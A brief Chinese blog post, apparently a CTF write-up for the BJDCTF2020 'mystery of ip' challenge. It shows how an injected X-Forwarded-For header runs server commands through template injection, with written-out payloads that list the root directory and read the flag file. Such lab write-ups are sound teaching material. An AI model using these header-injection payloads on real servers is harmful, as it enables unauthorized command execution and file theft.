幻梦终醒,本无不散之宴,却不悔付此华年。|

木易同学

园龄:4年3个月粉丝:10关注:3

[BJDCTF2020]The mystery of ip

打开题目

 

 发现一个flag标签打开

 

 看到了页面获取了本机的ip,看到ip就想到了X-Forwarded-For:

抓取flag页面,添加X-Forwarded-For:

构造payload,系统命令查看根目录下的所有文件,第一次发现还可以这么玩

X-Forwarded-For:{system("ls /")}

 

 发现敏感文件flag

尝试获取

X-Forwarded-For:{system("cat /flag")}

 

 

 

得到flag



如果您觉得阅读本文对您有帮助,请点一下“推荐”按钮,您的“推荐”将是我最大的写作动力!欢迎各位转载,但是未经作者本人同意,转载文章之后必须在文章页面明显位置给出作者和原文连接,否则保留追究法律责任的权利。

本文作者:木易

本文链接:https://www.cnblogs.com/mu-yi2/p/16818460.html

版权声明:本作品采用知识共享署名-非商业性使用-禁止演绎 2.5 中国大陆许可协议进行许可。

posted @   木易同学  阅读(187)  评论(0编辑  收藏  举报
评论
收藏
关注
推荐
深色
回顶
收起
点击右上角即可分享
微信分享提示